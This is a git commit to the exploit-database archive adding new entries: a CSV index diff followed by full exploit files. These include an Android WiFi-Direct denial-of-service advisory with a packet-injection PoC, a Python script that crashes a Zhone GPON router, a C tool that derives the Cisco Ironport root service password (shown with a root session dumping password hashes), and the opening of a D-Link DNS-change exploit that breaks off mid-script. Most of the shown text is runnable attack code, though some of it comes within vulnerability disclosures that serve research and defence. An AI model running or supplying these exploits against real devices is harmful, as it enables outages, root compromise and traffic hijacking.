Update: 2015-01-28

24 new exploits
This commit is contained in:
Offensive Security 2015-01-28 08:35:58 +00:00
parent db799531d8
commit 40cfbfb905
25 changed files with 2996 additions and 0 deletions

View file

@ -32307,6 +32307,9 @@ id,file,description,date,author,platform,type,port
35854,platforms/php/webapps/35854.pl,"Phpnuke 8.3 'upload.php' Arbitrary File Upload Vulnerability (2)",2011-06-13,pentesters.ir,php,webapps,0
35855,platforms/php/remote/35855.txt,"PHP <= 5.3.6 Security Bypass Vulnerability",2011-06-14,"Krzysztof Kotowicz",php,remote,0
35856,platforms/multiple/dos/35856.html,"Opera Web Browser 11.11 Denial of Service Vulnerability",2011-06-14,echo,multiple,dos,0
35857,platforms/php/webapps/35857.txt,"ArticleFR CMS 3.0.5 - SQL Injection Vulnerability",2015-01-21,TranDinhTien,php,webapps,0
35858,platforms/php/webapps/35858.txt,"ArticleFR CMS 3.0.5 - Arbitrary File Upload",2015-01-21,TranDinhTien,php,webapps,0
35859,platforms/hardware/dos/35859.py,"Zhone GPON 2520 R4.0.2.566b - Crash PoC",2015-01-21,"Kaczinski Ramirez",hardware,dos,0
35861,platforms/php/webapps/35861.txt,"vBTube 1.2.9 'vBTube.php' Multiple Cross Site Scripting Vulnerabilities",2011-06-14,Mr.ThieF,php,webapps,0
35862,platforms/php/webapps/35862.txt,"miniblog 1.0 Multiple Cross Site Scripting Vulnerabilities",2011-06-15,"High-Tech Bridge SA",php,webapps,0
35863,platforms/php/webapps/35863.php,"myBloggie 2.1.6 HTML-injection and SQL Injection Vulnerabilities",2011-06-15,"Robin Verton",php,webapps,0
@ -32318,19 +32321,40 @@ id,file,description,date,author,platform,type,port
35870,platforms/windows/dos/35870.rb,"Exif Pilot 4.7.2 - SEH Based Buffer Overflow",2015-01-22,"Osanda M. Jayathissa",windows,dos,0
35871,platforms/php/webapps/35871.txt,"Sitemagic CMS 2010.04.17 'SMExt' Parameter Cross Site Scripting Vulnerability",2011-06-21,"Gjoko Krstic",php,webapps,0
35872,platforms/asp/webapps/35872.txt,"H3C ER5100 Authentication Bypass Vulnerability",2011-06-22,128bit,asp,webapps,0
35873,platforms/windows/remote/35873.txt,"Wireshark 1.4.5 'bytes_repr_len()' NULL Pointer Dereference Denial Of Service Vulnerability",2011-06-17,rouli,windows,remote,0
35874,platforms/php/webapps/35874.txt,"Eshop Manager Multiple SQL Injection Vulnerabilities",2011-06-22,"Number 7",php,webapps,0
35875,platforms/php/webapps/35875.txt,"FanUpdate 3.0 'pageTitle' Parameter Cross Site Scripting Vulnerability",2011-06-22,"High-Tech Bridge SA",php,webapps,0
35876,platforms/windows/dos/35876.html,"Easewe FTP OCX ActiveX Control 4.5.0.9 'EaseWeFtp.ocx' Multiple Insecure Method Vulnerabilities",2011-06-22,"High-Tech Bridge SA",windows,dos,0
35877,platforms/php/webapps/35877.txt,"Sitemagic CMS 'SMTpl' Parameter Directory Traversal Vulnerability",2011-06-23,"Andrea Bocchetti",php,webapps,0
35878,platforms/php/webapps/35878.txt,"ecommerceMajor - SQL Injection And Authentication bypass",2015-01-22,"Manish Tanwar",php,webapps,0
35880,platforms/windows/remote/35880.html,"LEADTOOLS Imaging LEADSmtp ActiveX Control 'SaveMessage()' Insecure Method Vulnerability",2011-06-23,"High-Tech Bridge SA",windows,remote,0
35881,platforms/windows/remote/35881.c,"xAurora 10.00 'RSRC32.DLL' DLL Loading Arbitrary Code Execution Vulnerability",2011-06-24,"Zer0 Thunder",windows,remote,0
35882,platforms/php/webapps/35882.txt,"Nodesforum '_nodesforum_node' Parameter SQL Injection Vulnerability",2011-06-23,"Andrea Bocchetti",php,webapps,0
35883,platforms/php/webapps/35883.txt,"Joomla! 'com_morfeoshow' Component 'idm' Parameter SQL Injection Vulnerability",2011-06-27,Th3.xin0x,php,webapps,0
35884,platforms/php/webapps/35884.txt,"Mambo CMS 4.6.x Multiple Cross Site Scripting Vulnerabilities",2011-06-27,"Aung Khant",php,webapps,0
35885,platforms/windows/remote/35885.txt,"Ubisoft CoGSManager ActiveX Control 1.0.0.23 'Initialize()' Method Stack Buffer Overflow Vulnerability",2011-06-27,"Luigi Auriemma",windows,remote,0
35886,platforms/windows/remote/35886.txt,"Sybase Advantage Server 10.0.0.3 'ADS' Process Off By One Buffer Overflow Vulnerability",2011-06-27,"Luigi Auriemma",windows,remote,0
35887,platforms/hardware/remote/35887.txt,"Cisco Ironport Appliances - Privilege Escalation Vulnerability",2015-01-22,"Glafkos Charalambous ",hardware,remote,0
35890,platforms/jsp/webapps/35890.txt,"ManageEngine ServiceDesk Plus 9.0 - SQL Injection Vulnerability",2015-01-22,"Muhammad Ahmed Siddiqui",jsp,webapps,0
35891,platforms/jsp/webapps/35891.txt,"ManageEngine ServiceDesk Plus 9.0 - User Enumeration Vulnerability",2015-01-22,"Muhammad Ahmed Siddiqui",jsp,webapps,8080
35892,platforms/multiple/remote/35892.txt,"MySQLDriverCS 4.0.1 SQL Injection Vulnerability",2011-06-27,"Qihan Luo",multiple,remote,0
35893,platforms/php/webapps/35893.txt,"WordPress Pretty Link Lite Plugin 1.4.56 Multiple SQL Injection Vulnerabilities",2011-06-27,MaKyOtOx,php,webapps,0
35894,platforms/php/webapps/35894.txt,"Joomla! CMS 1.6.3 Multiple Cross Site Scripting Vulnerabilities",2011-06-28,"Aung Khant",php,webapps,0
35895,platforms/windows/dos/35895.txt,"RealityServer Web Services RTMP Server 3.1.1 build 144525.5 NULL Pointer Dereference Denial Of Service Vulnerability",2011-06-28,"Luigi Auriemma",windows,dos,0
35896,platforms/php/webapps/35896.txt,"FlatPress 0.1010.1 Multiple Cross Site Scripting Vulnerabilities",2011-06-28,"High-Tech Bridge SA",php,webapps,0
35897,platforms/windows/remote/35897.html,"CygniCon CyViewer ActiveX Control 'SaveData()' Insecure Method Vulnerability",2011-06-28,"High-Tech Bridge SA",windows,remote,0
35898,platforms/multiple/remote/35898.php,"Atlassian JIRA <= 3.13.5 File Download Security Bypass Vulnerability",2011-06-28,"Ignacio Garrido",multiple,remote,0
35899,platforms/php/webapps/35899.txt,"Mangallam CMS - SQL Injection Web Vulnerability",2015-01-26,Vulnerability-Lab,php,webapps,0
35900,platforms/php/webapps/35900.txt,"Barracuda Networks Cloud Series - Filter Bypass Vulnerability",2015-01-26,Vulnerability-Lab,php,webapps,0
35901,platforms/windows/local/35901.txt,"VLC Player 2.1.5 - DEP Access Violation Vulnerability",2015-01-26,"Veysel HATAS",windows,local,0
35902,platforms/windows/local/35902.txt,"VLC Player 2.1.5 - Write Access Violation Vulnerability",2015-01-26,"Veysel HATAS",windows,local,0
35904,platforms/jsp/webapps/35904.txt,"ManageEngine ServiceDesk Plus 9.0 (< Build 9031) - User Privileges Management Vulnerability",2015-01-26,"Rewterz - Research Group",jsp,webapps,0
35905,platforms/windows/local/35905.c,"Comodo Backup 4.4.0.0 - NULL Pointer Dereference EOP",2015-01-26,"Parvez Anwar",windows,local,0
35906,platforms/php/webapps/35906.txt,"PHP Webquest 2.6 - SQL Injection",2015-01-26,"jordan root",php,webapps,0
35908,platforms/multiple/webapps/35908.txt,"SWFupload 2.5.0 - Cross Frame Scripting (XFS) Vulnerability",2015-01-26,"Maddy Khan",multiple,webapps,0
35910,platforms/jsp/webapps/35910.txt,"ManageEngine EventLog Analyzer 9.0 - Directory Traversal / XSS Vulnerabilities",2015-01-26,"Sepahan TelCom IT Group",jsp,webapps,0
35911,platforms/multiple/webapps/35911.txt,"jclassifiedsmanager - Multiple Vulnerabilities",2015-01-26,"Sarath Nair",multiple,webapps,0
35913,platforms/android/dos/35913.txt,"Android WiFi-Direct Denial of Service",2015-01-26,"Core Security",android,dos,0
35914,platforms/php/webapps/35914.txt,"ferretCMS 1.0.4-alpha - Multiple Vulnerabilities",2015-01-26,"Steffen Rösemann",php,webapps,80
35915,platforms/multiple/webapps/35915.txt,"Symantec Data Center Security - Multiple Vulnerabilities",2015-01-26,"SEC Consult",multiple,webapps,0
35917,platforms/hardware/remote/35917.txt,"D-Link DSL-2740R - Unauthenticated Remote DNS Change Exploit",2015-01-27,"Todor Donev",hardware,remote,0

Can't render this file because it is too large.

438
platforms/android/dos/35913.txt Executable file
View file

@ -0,0 +1,438 @@
Core Security - Corelabs Advisory
http://corelabs.coresecurity.com/
Android WiFi-Direct Denial of Service
1. *Advisory Information*
Title: Android WiFi-Direct Denial of Service
Advisory ID: CORE-2015-0002
Advisory URL:
http://www.coresecurity.com/advisories/android-wifi-direct-denial-service
Date published: 2015-01-26
Date of last update: 2015-01-26
Vendors contacted: Android Security Team
Release mode: User release
2. *Vulnerability Information*
Class: Uncaught Exception [CWE-248]
Impact: Denial of service
Remotely Exploitable: Yes
Locally Exploitable: No
CVE Name: CVE-2014-0997
3. *Vulnerability Description*
Some Android devices are affected by a Denial of Service attack when
scanning for WiFi Direct devices.
An attacker could send a specially crafted 802.11 Probe Response frame
causing the Dalvik subsystem to reboot because of an Unhandle Exception
on WiFiMonitor class.
4. *Vulnerable Packages*
. Nexus 5 - Android 4.4.4
. Nexus 4 - Android 4.4.4
. LG D806 - Android 4.2.2
. Samsung SM-T310 - Android 4.2.2
. Motorola RAZR HD - Android 4.1.2
Other devices could be also affected.
5. *Non-vulnerable packages*
. Android 5.0.1
. Android 5.0.2
6. *Vendor Information, Solutions and Workarounds*
Some mitigation actions may be to avoid using WiFi-Direct or update
to a non-vulnerable Android version.
Contact vendor for further information.
7. *Credits*
This vulnerability was discovered and researched by Andres Blanco
from the CoreLabs
Team. The publication of this advisory was coordinated by the Core
Advisories
Team.
8. *Technical Description / Proof of Concept Code*
Android makes use of a modified *wpa_supplicant*[1]
in order to provide an interface between the wireless driver and the
Android platform framework.
Below the function that handles *wpa_supplicant* events. This function
returns a jstring from calling NewStringUTF method.
/-----
static jstring android_net_wifi_waitForEvent(JNIEnv* env, jobject)
{
char buf[EVENT_BUF_SIZE];
int nread = ::wifi_wait_for_event(buf, sizeof buf);
if (nread > 0) {
return env->NewStringUTF(buf);
} else {
return NULL;
}
}
-----/
The WiFi-Direct specification defines the P2P discovery procedure to
enable P2P
devices to exchange device information, the device name is part of
this information.
The WifiP2pDevice class, located at
/wifi/java/android/net/wifi/p2p/WifiP2pDevice.java,
represents a Wi-Fi p2p device. The constructor method receives the
string provided by
the *wpa_supplicant* and throws an IllegalArgumentException in case
the event is malformed.
Below partial content of the WiFiP2PDevice.java file.
/-----
[...]
/** Detailed device string pattern with WFD info
* Example:
* P2P-DEVICE-FOUND 00:18:6b:de:a3:6e
p2p_dev_addr=00:18:6b:de:a3:6e
* pri_dev_type=1-0050F204-1 name='DWD-300-DEA36E'
config_methods=0x188
* dev_capab=0x21 group_capab=0x9
*/
private static final Pattern detailedDevicePattern =
Pattern.compile(
"((?:[0-9a-f]{2}:){5}[0-9a-f]{2}) " +
"(\\d+ )?" +
"p2p_dev_addr=((?:[0-9a-f]{2}:){5}[0-9a-f]{2}) " +
"pri_dev_type=(\\d+-[0-9a-fA-F]+-\\d+) " +
"name='(.*)' " +
"config_methods=(0x[0-9a-fA-F]+) " +
"dev_capab=(0x[0-9a-fA-F]+) " +
"group_capab=(0x[0-9a-fA-F]+)" +
"( wfd_dev_info=0x000006([0-9a-fA-F]{12}))?"
);
[...]
/**
* @param string formats supported include
* P2P-DEVICE-FOUND fa:7b:7a:42:02:13
p2p_dev_addr=fa:7b:7a:42:02:13
* pri_dev_type=1-0050F204-1 name='p2p-TEST1'
config_methods=0x188 dev_capab=0x27
* group_capab=0x0 wfd_dev_info=000006015d022a0032
*
* P2P-DEVICE-LOST p2p_dev_addr=fa:7b:7a:42:02:13
*
* AP-STA-CONNECTED 42:fc:89:a8:96:09
[p2p_dev_addr=02:90:4c:a0:92:54]
*
* AP-STA-DISCONNECTED 42:fc:89:a8:96:09
[p2p_dev_addr=02:90:4c:a0:92:54]
*
* fa:7b:7a:42:02:13
*
* Note: The events formats can be looked up in the
wpa_supplicant code
* @hide
*/
public WifiP2pDevice(String string) throws
IllegalArgumentException {
String[] tokens = string.split("[ \n]");
Matcher match;
if (tokens.length < 1) {
throw new IllegalArgumentException("Malformed supplicant
event");
}
switch (tokens.length) {
case 1:
/* Just a device address */
deviceAddress = string;
return;
case 2:
match = twoTokenPattern.matcher(string);
if (!match.find()) {
throw new IllegalArgumentException("Malformed
supplicant event");
}
deviceAddress = match.group(2);
return;
case 3:
match = threeTokenPattern.matcher(string);
if (!match.find()) {
throw new IllegalArgumentException("Malformed
supplicant event");
}
deviceAddress = match.group(1);
return;
default:
match = detailedDevicePattern.matcher(string);
if (!match.find()) {
throw new IllegalArgumentException("Malformed
supplicant event");
}
deviceAddress = match.group(3);
primaryDeviceType = match.group(4);
deviceName = match.group(5);
wpsConfigMethodsSupported = parseHex(match.group(6));
deviceCapability = parseHex(match.group(7));
groupCapability = parseHex(match.group(8));
if (match.group(9) != null) {
String str = match.group(10);
wfdInfo = new
WifiP2pWfdInfo(parseHex(str.substring(0,4)),
parseHex(str.substring(4,8)),
parseHex(str.substring(8,12)));
}
break;
}
if (tokens[0].startsWith("P2P-DEVICE-FOUND")) {
status = AVAILABLE;
}
}
[...]
-----/
On some Android devices when processing a probe response frame with a
WiFi-Direct(P2P)
information element that contains a device name attribute with
specific bytes generates
a malformed supplicant event string that ends up throwing the
IllegalArgumentException.
As this exception is not handled the Android system restarts.
Below partial content of the logcat of a Samsung SM-T310 running
Android 4.2.2.
/-----
I/p2p_supplicant( 2832): P2P-DEVICE-FOUND 00.EF.00
p2p_dev_addr=00.EF.00 pri_dev_type=10-0050F204-5 'fa¬¬'
config_methods=0x188 dev_capab=0x21 group_capab=0x0
E/AndroidRuntime( 2129): !@*** FATAL EXCEPTION IN SYSTEM PROCESS:
WifiMonitor
E/AndroidRuntime( 2129): java.lang.IllegalArgumentException:
Malformed supplicant event
E/AndroidRuntime( 2129): at
android.net.wifi.p2p.WifiP2pDevice.<init>(WifiP2pDevice.java:229)
E/AndroidRuntime( 2129): at
android.net.wifi.WifiMonitor$MonitorThread.handleP2pEvents(WifiMonitor.java:966)
E/AndroidRuntime( 2129): at
android.net.wifi.WifiMonitor$MonitorThread.run(WifiMonitor.java:574)
E/android.os.Debug( 2129): !@Dumpstate > dumpstate -k -t -z -d -o
/data/log/dumpstate_sys_error
-----/
8.1. *Proof of Concept*
This PoC was implemented using the open source library Lorcon
[2] and PyLorcon2 [3], a Python wrapper for the Lorcon library.
/-----
#!/usr/bin/env python
import sys
import time
import struct
import PyLorcon2
def get_probe_response(source, destination, channel):
frame = str()
frame += "\x50\x00" # Frame Control
frame += "\x00\x00" # Duration
frame += destination
frame += source
frame += source
frame += "\x00\x00" # Sequence Control
frame += "\x00\x00\x00\x00\x00\x00\x00\x00" # Timestamp
frame += "\x64\x00" # Beacon Interval
frame += "\x30\x04" # Capabilities Information
# SSID IE
frame += "\x00"
frame += "\x07"
frame += "DIRECT-"
# Supported Rates
frame += "\x01"
frame += "\x08"
frame += "\x8C\x12\x98\x24\xB0\x48\x60\x6C"
# DS Parameter Set
frame += "\x03"
frame += "\x01"
frame += struct.pack("B", channel)
# P2P
frame += "\xDD"
frame += "\x27"
frame += "\x50\x6F\x9A"
frame += "\x09"
# P2P Capabilities
frame += "\x02" # ID
frame += "\x02\x00" # Length
frame += "\x21\x00"
# P2P Device Info
frame += "\x0D" # ID
frame += "\x1B\x00" # Length
frame += source
frame += "\x01\x88"
frame += "\x00\x0A\x00\x50\xF2\x04\x00\x05"
frame += "\x00"
frame += "\x10\x11"
frame += "\x00\x06"
frame += "fafa\xFA\xFA"
return frame
def str_to_mac(address):
return "".join(map(lambda i: chr(int(i, 16)), address.split(":")))
if __name__ == "__main__":
if len(sys.argv) != 3:
print "Usage:"
print " poc.py <iface> <target>"
print "Example:"
print " poc.py wlan0 00:11:22:33:44:55"
sys.exit(-1)
iface = sys.argv[1]
destination = str_to_mac(sys.argv[2])
context = PyLorcon2.Context(iface)
context.open_injmon()
channel = 1
source = str_to_mac("00:11:22:33:44:55")
frame = get_probe_response(source, destination, channel)
print "Injecting PoC."
for i in range(100):
context.send_bytes(frame)
time.sleep(0.100)
-----/
9. *Report Timeline*
. 2014-09-26:
Core Security contacts Android security team to inform them that
a vulnerability has been found in Android. Core Security sends a draft
advisory with technical details and PoC files.
. 2014-09-29:
Android Security Team acknowledges reception of the advisory.
. 2014-09-30:
Core Security notifies that the tentative publication date is
set for Oct 20rd, 2014.
. 2014-09-30:
Android Security Team acknowledges.
. 2014-10-16:
Core Security requests a status update.
. 2014-10-16:
Android Security Team responds that they have classify the
vulnerability as low severity and don't currently have a timeline for
releasing a fix.
. 2014-10-20:
Core Security does not completely agrees with the vulnerability
classification and reschedule the publication of the advisory.
. 2014-10-16:
Android Security Team acknowledges and strengthens it's position
that they don't currently have a timeline for releasing a fix.
. 2015-01-06:
Core Security requests a status update.
. 2015-01-12:
Core Security asks for confirmation of reception of the previous
email.
. 2015-01-16:
Android Security Team acknowledges and respond that they don't
currently have a timeline for releasing a fix.
. 2015-01-19:
Core Security notifies that vendor cooperation is needed in
order to keep this process coordinated. If vendor refuses to provide the
requested information the advisory will be released tagged as 'user
release'. The advisory is re-scheduled for January 26th, 2015.
. 2015-01-20:
Android Security Team acknowledges and respond that they don't
currently have a timeline for releasing a fix.
. 2015-01-26:
The advisory CORE-2015-0002 is published.
10. *References*
[1] - wpa_supplicant site. http://w1.fi/wpa_supplicant/
[2] - Lorcon site. https://code.google.com/p/lorcon
[3] - PyLorcon2 site. http://code.google.com/p/pylorcon2
11. *About CoreLabs*
CoreLabs, the research center of Core Security, is charged with
anticipating
the future needs and requirements for information security technologies.
We conduct our research in several important areas of computer security
including system vulnerabilities, cyber attack planning and simulation,
source code auditing, and cryptography. Our results include problem
formalization, identification of vulnerabilities, novel solutions and
prototypes for new technologies. CoreLabs regularly publishes security
advisories, technical papers, project information and shared software
tools for public use at:
http://corelabs.coresecurity.com.
12. *About Core Security Technologies*
Core Security Technologies enables organizations to get ahead of threats
with security test and measurement solutions that continuously identify
and demonstrate real-world exposures to their most critical assets. Our
customers can gain real visibility into their security standing, real
validation of their security controls, and real metrics to more
effectively secure their organizations.
Core Security's software solutions build on over a decade of trusted
research and leading-edge threat expertise from the company's Security
Consulting Services, CoreLabs and Engineering groups. Core Security
Technologies can be reached at +1 (617) 399-6980 or on the Web at:
http://www.coresecurity.com.
13. *Disclaimer*
The contents of this advisory are copyright
(c) 2014 Core Security and (c) 2014 CoreLabs,
and are licensed under a Creative Commons
Attribution Non-Commercial Share-Alike 3.0 (United States) License:
http://creativecommons.org/licenses/by-nc-sa/3.0/us/
14. *PGP/GPG Keys*
This advisory has been signed with the GPG key of Core Security
advisories team, which is available for download at
http://www.coresecurity.com/files/attachments/core_security_advisories.asc.

40
platforms/hardware/dos/35859.py Executable file
View file

@ -0,0 +1,40 @@
from httplib2 import Http
from urllib import urlencode
import sys,time
#main function
if __name__ == "__main__":
if(len(sys.argv) != 2):
print '*********************************************************************************'
print ' GPON Zhone R4.0.2.566b D.O.S.'
print ' Tested on'
print ' GPON Zhone 2520'
print ' Hardware: 0040-48-02'
print ' Software: R4.0.2.566b'
print ' '
print ' Usage : python', sys.argv[0] + ' <ip>'
print ' Ex : python',sys.argv[0] + ' 192.168.15.1'
print ' Author : Kaczinski lramirez@websec.mx '
print ' URL : http://www.websec.mx/advisories'
print '*********************************************************************************'
sys.exit()
HOST = sys.argv[1]
LIMIT = 100000
COUNT = 1
SIZE = 10
BUFFER = ''
while len(BUFFER) < LIMIT:
BUFFER = '\x41' * COUNT
print "[+] Sending evil buffer with length:", len(BUFFER)
h = Http()
h.follow_redirects = True
data = dict(XWebPageName=buffer, oldpassword=BUFFER, password="", password2="test", passwdtip="test")
try:
resp, content = h.request("http://" + HOST + "/GponForm/LoginForm", "POST", urlencode(data))
except:
print "[+] GPON should be down, is not responding..."
sys.exit()
COUNT = COUNT * SIZE
print "[-] GPON not vulnerable"

View file

@ -0,0 +1,240 @@
/*
Cisco Ironport Appliances Privilege Escalation Vulnerability
Vendor: Cisco
Product webpage: http://www.cisco.com
Affected version(s):
Cisco Ironport ESA - AsyncOS 8.5.5-280
Cisco Ironport WSA - AsyncOS 8.0.5-075
Cisco Ironport SMA - AsyncOS 8.3.6-0
Date: 22/05/2014
Credits: Glafkos Charalambous
CVE: Not assigned by Cisco
Disclosure Timeline:
19-05-2014: Vendor Notification
20-05-2014: Vendor Response/Feedback
27-08-2014: Vendor Fix/Patch
24-01-2015: Public Disclosure
Description:
Cisco Ironport appliances are vulnerable to authenticated "admin" privilege escalation.
By enabling the Service Account from the GUI or CLI allows an admin to gain root access on the appliance, therefore bypassing all existing "admin" account limitations.
The vulnerability is due to weak algorithm implementation in the password generation process which is used by Cisco to remotely access the appliance to provide technical support.
Vendor Response:
As anticipated, this is not considered a vulnerability but a security hardening issue. As such we did not assign a CVE however I made sure that this is fixed on SMA, ESA and WSA. The fix included several changes such as protecting better the algorithm in the binary, changing the algorithm itself to be more robust and enforcing password complexity when the administrator set the pass-phrase and enable the account.
[SD] Note: Administrative credentials are needed in order to activate the access to support representative and to set up the pass-phrase that it is used to compute the final password.
[GC] Still Admin user has limited permissions on the appliance and credentials can get compromised too, even with default password leading to full root access.
[SD] This issue is tracked for the ESA by Cisco bug id: CSCuo96011 for the SMA by Cisco bug id: CSCuo96056 and for WSA by Cisco bug id CSCuo90528
Technical Details:
By logging in to the appliance using default password "ironport" or user specified one, there is an option to enable Customer Support Remote Access.
This option can be found under Help and Support -> Remote Access on the GUI or by using the CLI console account "enablediag" and issuing the command service.
Enabling this service requires a temporary user password which should be provided along with the appliance serial number to Cisco techsupport for remotely connecting and authenticating to the appliance.
Having a temporary password and the serial number of the appliance by enabling the service account, an attacker can in turn get full root access as well as potentially damage it, backdoor it, etc.
PoC:
Enable Service Account
----------------------
root@kali:~# ssh -lenablediag 192.168.0.158
Password:
Last login: Sat Jan 24 15:47:07 2015 from 192.168.0.163
Copyright (c) 2001-2013, Cisco Systems, Inc.
AsyncOS 8.5.5 for Cisco C100V build 280
Welcome to the Cisco C100V Email Security Virtual Appliance
Available Commands:
help -- View this text.
quit -- Log out.
service -- Enable or disable access to the service system.
network -- Perform emergency configuration of the diagnostic network interface.
clearnet -- Resets configuration of the diagnostic network interface.
ssh -- Configure emergency SSH daemon on the diagnostic network interface.
clearssh -- Stop emergency SSH daemon on the diagnostic network interface.
tunnel -- Start up tech support tunnel to IronPort.
print -- Print status of the diagnostic network interface.
reboot -- Reboot the appliance.
S/N 564DDFABBD0AD5F7A2E5-2C6019F508A4
Service Access currently disabled.
ironport.example.com> service
Service Access is currently disabled. Enabling this system will allow an
IronPort Customer Support representative to remotely access your system
to assist you in solving your technical issues. Are you sure you want
to do this? [Y/N]> Y
Enter a temporary password for customer support to use. This password may
not be the same as your admin password. This password will not be able
to be used to directly access your system.
[]> cisco123
Service access has been ENABLED. Please provide your temporary password
to your IronPort Customer Support representative.
S/N 564DDFABBD0AD5F7A2E5-2C6019F508A4
Service Access currently ENABLED (0 current service logins)
ironport.example.com>
Generate Service Account Password
---------------------------------
Y:\Vulnerabilities\cisco\ironport>woofwoof.exe
Usage: woofwoof.exe -p password -s serial
-p <password> | Cisco Service Temp Password
-s <serial> | Cisco Serial Number
-h | This Help Menu
Example: woofwoof.exe -p cisco123 -s 564DDFABBD0AD5F7A2E5-2C6019F508A4
Y:\Vulnerabilities\cisco\ironport>woofwoof.exe -p cisco123 -s 564DDFABBD0AD5F7A2E5-2C6019
F508A4
Service Password: b213c9a4
Login to the appliance as Service account with root privileges
--------------------------------------------------------------
root@kali:~# ssh -lservice 192.168.0.158
Password:
Last login: Wed Dec 17 21:15:24 2014 from 192.168.0.10
Copyright (c) 2001-2013, Cisco Systems, Inc.
AsyncOS 8.5.5 for Cisco C100V build 280
Welcome to the Cisco C100V Email Security Virtual Appliance
# uname -a
FreeBSD ironport.example.com 8.2-RELEASE FreeBSD 8.2-RELEASE #0: Fri Mar 14 08:04:05 PDT 2014 auto-build@vm30esa0109.ibeng:/usr/build/iproot/freebsd/mods/src/sys/amd64/compile/MESSAGING_GATEWAY.amd64 amd64
# cat /etc/master.passwd
# $Header: //prod/phoebe-8-5-5-br/sam/freebsd/install/dist/etc/master.passwd#1 $
root:*:0:0::0:0:Mr &:/root:/sbin/nologin
service:$1$bYeV53ke$Q7hVZA5heeb4fC1DN9dsK/:0:0::0:0:Mr &:/root:/bin/sh
enablediag:$1$VvOyFxKd$OF2Cs/W0ZTWuGTtMvT5zc/:999:999::0:0:Administrator support access control:/root:/data/bin/enablediag.sh
adminpassword:$1$aDeitl0/$BlmzKUSeRXoc4kcuGzuSP/:0:1000::0:0:Administrator Password Tool:/data/home/admin:/data/bin/adminpassword.sh
daemon:*:1:1::0:0:Owner of many system processes:/root:/sbin/nologin
operator:*:2:5::0:0:System &:/:/sbin/nologin
bin:*:3:7::0:0:Binaries Commands and Source,,,:/:/sbin/nologin
tty:*:4:65533::0:0:Tty Sandbox:/:/sbin/nologin
kmem:*:5:65533::0:0:KMem Sandbox:/:/sbin/nologin
man:*:9:9::0:0:Mister Man Pages:/usr/share/man:/sbin/nologin
sshd:*:22:22::0:0:Secure Shell Daemon:/var/empty:/sbin/nologin
nobody:*:65534:65534::0:0:Unprivileged user:/nonexistent:/sbin/nologin
support:$1$FgFVb064$SmsZv/ez7Pf4wJLp5830s/:666:666::0:0:Mr &:/root:/sbin/nologin
admin:$1$VvOyFxKd$OF2Cs/W0ZTWuGTtMvT5zc/:1000:1000::0:0:Administrator:/data/home/admin:/data/bin/cli.sh
clustercomm:*:900:1005::0:0:Cluster Communication User:/data/home/clustercomm:/data/bin/command_proxy.sh
smaduser:*:901:1007::0:0:Smad User:/data/home/smaduser:/data/bin/cli.sh
spamd:*:783:1006::0:0:CASE User:/usr/case:/sbin/nologin
pgsql:*:70:70::0:0:PostgreSQL pseudo-user:/usr/local/pgsql:/bin/sh
ldap:*:389:389::0:0:OpenLDAP Server:/nonexistent:/sbin/nologin
*/
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <ctype.h>
#include "md5.h"
#include "getopt.h"
#define MAX_BUFFER 128
#define SECRET_PASS "woofwoof"
void usage(char *name);
void to_lower(char *str);
void fuzz_string(char *str);
int main(int argc, char *argv[]) {
if (argc < 2) { usage(argv[0]); }
int opt;
int index;
char *temp_pass = { 0 };
char *serial_no = { 0 };
char *secret_pass = SECRET_PASS;
char service[MAX_BUFFER] = { 0 };
unsigned char digest[16] = { 0 };
while ((opt = getopt(argc, argv, "p:s:h")) != -1) {
switch (opt)
{
case 'p':
temp_pass = optarg;
break;
case 's':
serial_no = optarg;
break;
case 'h': usage(argv[0]);
break;
default:
printf_s("Wrong Argument: %s\n", argv[1]);
break;
}
}
for (index = optind; index < argc; index++) {
usage(argv[0]);
exit(0);
}
if (temp_pass == NULL || serial_no == NULL) {
usage(argv[0]);
exit(0);
}
if ((strlen(temp_pass) <= sizeof(service)) && (strlen(serial_no) <= sizeof(service))) {
to_lower(serial_no);
fuzz_string(temp_pass);
strcpy_s(service, sizeof(service), temp_pass);
strcat_s(service, sizeof(service), serial_no);
strcat_s(service, sizeof(service), secret_pass);
MD5_CTX context;
MD5_Init(&context);
MD5_Update(&context, service, strlen(service));
MD5_Final(digest, &context);
printf_s("Service Password: ");
for (int i = 0; i < sizeof(digest)-12; i++)
printf("%02x", digest[i]);
}
return 0;
}
void fuzz_string(char *str) {
while (*str){
switch (*str) {
case '1': *str = 'i'; break;
case '0': *str = 'o'; break;
case '_': *str = '-'; break;
}
str++;
}
}
void to_lower(char *str) {
while (*str) {
if (*str >= 'A' && *str <= 'Z') {
*str += 0x20;
}
str++;
}
}
void usage(char *name) {
printf_s("\nUsage: %s -p password -s serial\n", name);
printf_s(" -p <password> | Cisco Service Temp Password\n");
printf_s(" -s <serial> | Cisco Serial Number\n");
printf_s(" -h | This Help Menu\n");
printf_s("\n Example: %s -p cisco123 -s 564DDFABBD0AD5F7A2E5-2C6019F508A4\n", name);
exit(0);
}

View file

@ -0,0 +1,65 @@
#!/bin/bash
#
# D-Link DSL-2740R Unauthenticated Remote DNS Change Exploit
#
# Copyright 2015 (c) Todor Donev <todor.donev at gmail.com>
# http://www.ethical-hacker.org/
#
# Description:
# Different D-Link Routers are vulnerable to DNS change.
# The vulnerability exist in the web interface, which is
# accessible without authentication.
#
# ACCORDING TO THE VULNERABILITY DISCOVERER, MORE D-Link
# DEVICES MAY AFFECTED.
#
# Once modified, systems use foreign DNS servers, which are
# usually set up by cybercriminals. Users with vulnerable
# systems or devices who try to access certain sites are
# instead redirected to possibly malicious sites.
#
# Modifying systems' DNS settings allows cybercriminals to
# perform malicious activities like:
#
# o Steering unknowing users to bad sites:
# These sites can be phishing pages that
# spoof well-known sites in order to
# trick users into handing out sensitive
# information.
#
# o Replacing ads on legitimate sites:
# Visiting certain sites can serve users
# with infected systems a different set
# of ads from those whose systems are
# not infected.
#
# o Controlling and redirecting network traffic:
# Users of infected systems may not be granted
# access to download important OS and software
# updates from vendors like Microsoft and from
# their respective security vendors.
#
# o Pushing additional malware:
# Infected systems are more prone to other
# malware infections (e.g., FAKEAV infection).
#
#
if [[ $# -gt 3 || $# -lt 2 ]]; then
echo " D-Link DSL-2740R Unauthenticated Remote DNS Change Exploit"
echo " ================================================================"
echo " Usage: $0 <Target> <Preferred DNS> <Alternate DNS>"
echo " Example: $0 192.168.1.1 8.8.8.8"
echo " Example: $0 192.168.1.1 8.8.8.8 8.8.4.4"
echo ""
echo " Copyright 2015 (c) Todor Donev <todor.donev at gmail.com>"
echo " http://www.ethical-hacker.org/"
exit;
fi
GET=`which GET 2>/dev/null`
if [ $? -ne 0 ]; then
